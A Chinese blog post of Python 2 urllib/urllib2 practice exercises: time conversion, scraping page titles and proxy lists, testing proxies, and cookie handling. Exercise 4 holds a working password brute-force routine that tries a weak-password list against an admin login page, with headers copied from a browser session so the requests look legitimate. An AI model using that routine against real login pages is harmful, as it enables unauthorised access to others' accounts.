• python例子-urllib,urllib2练习题合集.


    #!/usr/bin/python
    #coding:utf-8
    import time
    import urllib
    import urllib2
    from bs4 import BeautifulSoup
    import re
    import cookielib
    
    def main0():
        unix_timenow = int(time.time())
        print '当前时间:%d' % unix_timenow
    
        timenow = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(unix_timenow))
        print '当前标准时间:%s' % timenow
    
        time.sleep(3)
        unixtime = time.mktime(time.strptime(timenow,'%Y-%m-%d %H:%M:%S'))
        print 'unix时间:%s' % unixtime
    
    #1.将2015-1-16 12:00:00转化为unix时间,并计算此时间3天前的格式化时间和unix时间。
    def main1():
        time1 = '2015-1-16 12:00:00'
        unixtime1 = time.mktime(time.strptime(time1,'%Y-%m-%d %H:%M:%S'))
        print '1:unix时间戳:%s' % unixtime1
    
        unixtime2 = unixtime1 - 60*60*24*3
        print '1:3天前时间戳:%s' % unixtime2
        time2 = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(unixtime2))
        print '1:3天前格式化时间:%s' % time2
    
    #2、使用urllib访问百度首页,取得百度的title、返回状态码、内容长度、cookie值等信息。
    def main2():
        url = 'http://www.baidu.com'
        response = urllib.urlopen(url)
        headers = response.info()
        cookie = headers['Set-Cookie']        #如果有多个cookie.则一次性读完.                        
        html = response.read()                #就是一个str类型的html源码
        soup = BeautifulSoup(html)
        title = soup.title.string
        statucode = response.getcode()
        htmlLength = len(html)
        print 'title:%s
    status:%s
    contentlength:%s
    cookie:%s' % (title,statucode,htmlLength,cookie)
    
    # 3、使用urllib访问http://www.cz88.net/proxy/index.shtml取得代理服务器的IP地址。
    def main3():
        """Scrape proxy server entries from cz88.net and write them to
        proxy_ip.txt as comma-separated ``ip,port,type,addr`` lines.

        Fixes: the ``'\n'`` written after each row had been broken across two
        physical lines (syntax error); the output file is now managed with a
        ``with`` block so it is closed even if parsing raises.
        """
        url = 'http://www.cz88.net/proxy/index.shtml'
        response = urllib.urlopen(url)
        html = response.read()
        soup_html = BeautifulSoup(html)
        ip_div = soup_html.find_all('div', class_='box694')
        # One <li> per proxy: ip / port / type / address columns.
        pattern = re.compile('<li><div class="ip">(.*?)</div><div class="port">(.*?)</div><div class="type">(.*?)</div><div class="addr".*?>(.*?)</div></li>')
        with open('proxy_ip.txt', 'w') as fwip:
            for i in ip_div[0].ul:
                items = re.findall(pattern, str(i))
                if items != []:
                    li = list(items[0])
                    if li[0] != 'IP':  # skip the table header row
                        fwip.write(','.join(li) + '\n')
    
    # 4、urllib2模块练习
    # 使用weak_passwd.txt弱口令文件,暴力破解http://127.0.0.1/www/Login/index.html用户名和密码。
    def main4():
        fo = open('weak_passwd.txt','r')
        pass_list = fo.readlines()
        for i in pass_list:
            i = i.strip()
            isok = post('admin',i)
            if isok:
                print 'pasword:%s' % i
                return
        fo.close()
    
    def post(name,pwd):
        """POST a login attempt with the given username and password to the
        target's /www/Login/login/ endpoint and report success.

        Returns True when the server responds with the post-login page URL
        (i.e. the credentials worked), False otherwise.
        """
        data = urllib.urlencode({"username":name,"password":pwd});
        content_length = len(data)
        # Headers copied from a real browser session so the request looks legitimate
        # (the PHPSESSID cookie must match an open session on the target).
        headers = {
            "Host":"192.168.2.150",
            "Pragma":"no-cache",
            "Content-Length":content_length,
            "Accept": "text/html, application/xhtml+xml, */*",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NMJB; rv:11.0) like Gecko",
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": "http://192.168.1.139/www/Login/index.html",
            "Cookie": "thinkphp_show_page_trace=0|0; PHPSESSID=dbg5jjc9t76njqp6bimk43hjr4",
            }
            # Client = httplib.HTTPConnection("192.168.1.139",80,timeout=5)
            # Client.request("POST","/www/Login/login/",parames,headers)
            # response = Client.getresponse()
        
        url = 'http://192.168.1.139/www/Login/login/'
        request = urllib2.Request(url,data,headers)
        response = urllib2.urlopen(request)
        if response.geturl() == 'http://192.168.1.139/www/Show/index.html':    # how to detect a successful login differs per site; here success redirects to Show/index.html
            return True
        else:
            return False
    
    # 5、urllib2模块代理使用练习
    #    将练习题3中得到的代理保存在文件中,使用urllib2的代理模块验证哪些代理是可用的。
    def main6():
        proxy = 'proxy_ip.txt'
        proxy_list = open(proxy,'r').readlines()
        available_ip = []
        ip_tuple = None
        for i in proxy_list:
            i = i.split(',')
            isok = testProxy(i[0],i[1])
            if isok:
                available_ip.append((i[0],i[1]));
        for j in available_ip:
            print "available's IP is %s:%s" % (j[0],j[1])
    
    def testProxy(ip,port):
        """Return True if the HTTP proxy at ip:port can fetch baidu.com with
        status 200 within 5 seconds, False otherwise.

        Fix: the original ``try/except/else`` was miswired — ``except
        Exception: pass`` swallowed connection errors and fell off the end
        returning ``None``, while the ``else: return False`` branch was
        unreachable (every path inside the ``try`` already returned). Failures
        now explicitly return False.
        """
        proxyip = 'http://%s:%s' % (ip, port)
        proxy_handler = urllib2.ProxyHandler({'http': proxyip})  # route HTTP traffic through the candidate proxy
        opener = urllib2.build_opener(proxy_handler)
        request = urllib2.Request('http://www.baidu.com')
        try:
            response = opener.open(request, timeout=5)
        except Exception:
            return False  # timeout / refused / bad proxy — not usable
        return response.getcode() == 200
        
    #6.cookielib模块的使用
    def main7():
        #cookiefile = 'cookie.txt'    #本地要保存的cookie文件名
        #cookie = cookielib.MozillaCookieJar(cookiefile)     #传入本地cookie文件名生成cookie对象.
        #cookie = cookielib.MozillaCookieJar()            #加载本地文件中的cookie时用此语句创建cookie对象
        #cookie.load(cookiefile)        #加载本地文件对象中cookie.
        cookie = cookielib.CookieJar()    #默认cookie创建方式
        cookie_handler = urllib2.HTTPCookieProcessor(cookie)    #将cookie对象加入HTTP中
        opener = urllib2.build_opener(cookie_handler)        #创建HTTP请求处理对象Handler
        url = "http://www.qq.com"
        request = urllib2.Request(url)
        response = opener.open(request,timeout=5)
        print response.getcode()
    
    if __name__ == '__main__':
        # main0()
        # main1()
        # main2()
        main3()
        # main4()
        # Fix: the original called main5(), which is not defined anywhere in
        # this file (NameError). Exercise 5 (proxy validation) is implemented
        # by main6(), so that is what runs here.
        main6()
        # main7()
  • 相关阅读:
    【Codeforces Round #645 (Div. 2) F】 Tasty Cookie
    【Codeforces Round #645 (Div. 2) E】 Are You Fired?
    【Educational Codeforces Round 88 (Rated for Div. 2) C】 Mixing Water
    20191114-4 Beta发布用户使用报告
    20191114-3 Beta阶段贡献分配
    beta发布
    20191107-1 每周例行报告
    beta 2/2 阶段中间产物提交入口
    beta week 2/2 Scrum立会报告+燃尽图 07
    beta week 2/2 Scrum立会报告+燃尽图 06
  • 原文地址:https://www.cnblogs.com/xccnblogs/p/4888186.html
Copyright © 2020-2023  润新知